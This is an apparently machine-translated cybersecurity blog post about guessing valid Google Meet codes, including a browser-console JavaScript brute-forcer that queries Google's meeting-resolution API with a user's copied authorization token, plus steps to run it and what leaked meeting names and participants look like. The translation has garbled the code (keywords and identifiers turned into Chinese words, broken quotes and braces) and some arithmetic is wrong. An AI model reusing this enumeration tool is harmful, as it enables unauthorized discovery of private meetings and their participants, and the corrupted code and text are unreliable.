Visio-陷入Google Meet | Dyrk,Dyna Meet -Visio
見Visio
Contents
隨機=()=> dico = dico.分裂 (”).映射(value =>((< value, sort: Math.random() >)).咒語((a,b)=> a.咒語-b.拼寫).地圖 ((< value >)=>值).加入 (”),
newpatternkey =()=>“ xxx-xxxx-xxx”.分裂 (”).地圖(c => c ==’ – ‘?C:字符串.從charcode(數學.地板(數學.Random()*25)+97)).加入 (”),
key = newpatternkey(),counter = 20;
next =()=>鍵.分裂 (”).地圖(e => e ==’ – ‘ ? E:DICO [DICO.索引(e) + 1> = DICO.長度 ? 0:DICO.索引(e) + 1]).加入 (”),
計數器= 0;
MeetLink =’https://.Google.com/’,可用toe =()=> xhr = new xmlhttprequest();
if(Counter ++> = 20)Counter = 0;
key = newpatternkey();
Randomize();
>
key = next();
xhr.打開(’get’,meetlink +鍵);
xhr.Addeventlisner(’load’,(e)=> fetch(MeetLink).concat(“/$ rpc/google).RTC.會議.V1.MeetingSpaceService/ResolvemeetingSpace),“標題”:“授權”:授權,
“ content-type”:“ application/x-protobuf”,
“ X-Goog-Adep-key”:E.目標.責任.match(/\ [“ https \:\/\/emeet \ \ \.Google\.com \“ \,”([a-za-z0-9 \ _ \ – ])” \]/)[1],
“ X-Goog-authuse”:“ 0”,
“ X-Goog-endod-réspose-if-ectable”:“ base64”,
“ X-Goog-Meeting-stentifier”:BTOA(’\ b \ x02 \ x12 \ f’.concat(鍵)),
>,
“身體”:“ \ n \ f”.concat(鍵,“ 0 \ u0001”),
“方法”:“帖子”
>).然後(e => e.文字 ())
.然後(e => settimeout(可用,100);
安慰.log(MeetLink.concat(鍵).BeautifyDisplay(38),(e.替換(/[^a-za-Z0-9]/g,“”)+“”).BeautifyDisplay(38));
>);
>);
xhr.發送 ();
>;
細繩.原型.beautifydisplay =函數(大小) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >尺寸 ? TXT.長度:尺寸)).基德(0,大小).concat(’|’); >,
安慰.清除 ();
可用的 ();
>)()
dyrk
目前在網絡安全領域工作,我經常面對相當微不足道的情況.
最新,一個人在會議上的入侵 .
幸運的是,為了安全性,Google Meet包括一項功能,允許他們警告參與者,一個人試圖加入視頻會議,同時也接受或拒絕.
但是,這個事件使我問自己很多問題 .
Google的複雜性鏈接
首先,一個人如何在不被邀請的情況下連接到會議鏈接 ?
我們必須考慮鏈接的簡單性:https:// google.見面.comxxx -yyyy -zzzz
xxx -yyyy -zzzz 僅是A和Z之間的字母順序排列,即每個字符的27個可能的組合.
因此,對於數學家來說,有:
27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27可能的組合 .
Google Meet鏈接的壽命
儘管我們現在能夠更好地了解如何建立“ Google Meet”會議債券的鏈接,但要考慮到一個非常重要的方面 . Google Meet鏈接的壽命 !
確實,每個人都可以單擊幾下生成Google會議會議.
但是幾天,幾週或幾個月 . 鏈接不再有效.
因此,生成的鏈接具有一定的有效期 .
例外使“經常性”事件發生,這就是它變得有趣的地方.
在業務中,有很多機會定期組織(團隊 /業務,每日,每週,每月,, . )).
當員工在其議程中生成此類事件時,會自動生成Google Meet鏈接. 這個是不變的.
因此,您每次都會有相同的鏈接參加此活動.
有一點JavaScript和蠻力 ?
有了所有這些元素,我們現在有能力掃除所有可能性,並達到高概率來檢測與視頻共同介紹的鏈接 !
因此,我對Google Meet的操作進行了一些復古的保證,以編寫JavaScript代碼,該代碼將嘗試無限數量的組合
(c)dyrk.org 2023-2024-遇見輪盤賭
(1)在https:// google上運行此腳本.見面.com
(2)在Google的“ XHR請求”標題中找到並更新授權的變量,並具有有效的授權令牌
讓授權=“Sapisidhash xxxxxxxxxxxxxx_xxxxxxxxxxxxxxxxxxxxxxxxxxxx”,dico =“ abcdefghijklmnopqrstuvxz”,
隨機=()=> dico = dico.分裂 (”).映射(value =>((< value, sort: Math.random() >)).咒語((a,b)=> a.咒語-b.拼寫).地圖 ((< value >)=>值).加入 (”),
newpatternkey =()=>“ xxx-xxxx-xxx”.分裂 (”).地圖(c => c ==’ – ‘?C:字符串.從charcode(數學.地板(數學.Random()*25)+97)).加入 (”),
key = newpatternkey(),counter = 20;
next =()=>鍵.分裂 (”).地圖(e => e ==’ – ‘ ? E:DICO [DICO.索引(e) + 1> = DICO.長度 ? 0:DICO.索引(e) + 1]).加入 (”),
計數器= 0;
MeetLink =’https://.Google.com/’,可用toe =()=> xhr = new xmlhttprequest();
if(Counter ++> = 20)Counter = 0;
key = newpatternkey();
Randomize();
>
key = next();
xhr.打開(’get’,meetlink +鍵);
xhr.Addeventlisner(’load’,(e)=> fetch(MeetLink).concat(“/$ rpc/google).RTC.會議.V1.MeetingSpaceService/ResolvemeetingSpace),“標題”:“授權”:授權,
“ content-type”:“ application/x-protobuf”,
“ X-Goog-Adep-key”:E.目標.責任.match(/\ [“ https \:\/\/emeet \ \ \.Google\.com \“ \,”([a-za-z0-9 \ _ \ – ])” \]/)[1],
“ X-Goog-authuse”:“ 0”,
“ X-Goog-endod-réspose-if-ectable”:“ base64”,
“ X-Goog-Meeting-stentifier”:BTOA(’\ b \ x02 \ x12 \ f’.concat(鍵)),
>,
“身體”:“ \ n \ f”.concat(鍵,“ 0 \ u0001”),
“方法”:“帖子”
>).然後(e => e.文字 ())
.然後(e =>
settimeout(可用,100);
安慰.log(MeetLink.concat(鍵).BeautifyDisplay(38),(e.替換(/[^a-za-Z0-9]/g,“”)+“”).BeautifyDisplay(38));
>);
>);
xhr.發送 ();
>;
細繩.原型.beautifydisplay =函數(大小) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >尺寸 ? TXT.長度:尺寸)).基德(0,大小).concat(’|’); >,
安慰.清除 ();
可用的 ();
>)()
要運營所有這些,這是必要的:
- 打開頁面 https://見面.Google.com
- 打開開發人員控制台
- 在“網絡”選項卡中,過濾fetch / xhr&恢復令牌的令牌“授權”
- 複製並粘貼上面的源代碼,並放在該地點指示令牌.
- 用鍵盤上的“入口”鍵進行驗證.
恢復“授權”令牌:
出於好奇的是,這是該腳本中的結果的樣子.
因此,我們注意到的線條告訴我們,視頻會議的空間不存在.
還有其他使我們提高會議令牌的 ! 因此表明鏈接有效;)
但是,不要指望會在幾秒鐘內落在會議鏈接上^^
(除非你是一個幸運的男人)
您將需要耐心等待,讓它至少運行半小時.
結論
不要驚慌,發現找到有效的Google Meet Link比贏得Loto有更多運氣.
注意力 ! 遇到有效的鏈接鏈接訪問某些信息而無需連接的人:
會議的名稱(因此避免打滑機密信息)和連接的參與者(全部或遊戲).
見Visio
在線搶劫
同時多達1000名球員
Visio中的簡單訪問平台
Horizon 2024
同時多達1000名球員
Visio中的簡單訪問平台
查理在哪裡 ?!
同時多達1000名球員
Visio中的簡單訪問平台
謎任務
同時多達1000名球員
Visio中的簡單訪問平台
網絡安全意識
同時多達5000名球員
Visio中的簡單訪問平台
保存聖誕節 !
同時多達1000名球員
Visio中的簡單訪問平台
版權所有©2023 -Dyna’meet
管理同意餅乾
為了提供最佳體驗,我們使用餅乾等技術來存儲和/或訪問設備的信息. 同意這些技術將使我們能夠處理該網站上的數據,例如導航行為或唯一ID. 不同意或撤回同意的事實可能會對某些特徵和功能產生負面影響.
功能性功能始終激活
在合法利益結束時,嚴格必要存儲或技術訪問,以便允許使用訂戶或用戶明確要求的特定服務,或者出於唯一目的是在電子通信網絡上傳輸通信.
偏好偏好
為了使訂戶或使用該服務的人員要求的偏好量存儲或技術訪問是為了存儲不要求的偏好.
統計統計
專門用於統計目的的存儲或技術訪問. 僅用於匿名統計目的的存儲或技術訪問. 在沒有出現的傳票的情況下,您的Internet訪問提供商的自願遵守或第三方的其他記錄,在此目前存儲或提取的信息通常不能用於識別您.
存儲或技術訪問對於創建用戶配置文件是必要的,以發送廣告,或在網站或具有相似營銷目的的幾個網站上關注用戶.